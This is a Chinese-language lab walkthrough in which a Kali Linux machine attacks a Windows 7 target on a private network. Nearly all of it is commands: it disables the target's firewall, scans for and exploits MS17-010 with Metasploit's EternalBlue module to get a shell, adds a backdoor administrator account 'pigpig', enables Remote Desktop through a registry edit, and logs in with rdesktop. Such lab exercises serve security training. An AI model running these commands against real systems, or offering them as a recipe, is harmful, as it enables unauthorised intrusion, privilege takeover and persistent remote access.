攻击机:Kali-linux 2023.2a 靶机:Windows 7 SP1旗舰版
打开cmd查看ip地址
ipconfig
打开网络和共享中心
进入windows防火墙设置
成功关闭防火墙
在kali linux里
ping 192.168.137.130
在windows 7里
ping 192.168.137.128
两边都ping得通,说明通讯正常
运行postgresql数据库
service postgresql start
打开msf
msfconsole
使用相关模块
use auxiliary/scanner/smb/smb_ms17_010
查看相关配置信息
show options
设置目标IP为靶机的IP
set rhost 192.168.137.130
开始对靶机进行扫描
run
搜索msf17010漏洞模块
search ms17-010
使用该漏洞模块进行攻击
use exploit/windows/smb/ms17_010_eternalblue
查看其配置详情
show options
设置靶机IP
set rhost 192.168.137.130
使用exploit或者run命令进行攻击
exploit
获取shell
shell
创建管理员账户
net user pigpig 123456 /add
我们在win7那边已经可以看到了
增加管理员权限
net localgroup administrators pigpig /add
在去win7那边观察
将win7靶机那边远程服务打开
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
打开3389端口之后,在新的shell里
rdesktop 192.168.137.130:3389
点击yes之后,就可以在kali里面进入到win7靶机了。
输入账户密码回车,点了同意靶机的管理员账户就会掉线
成功进入了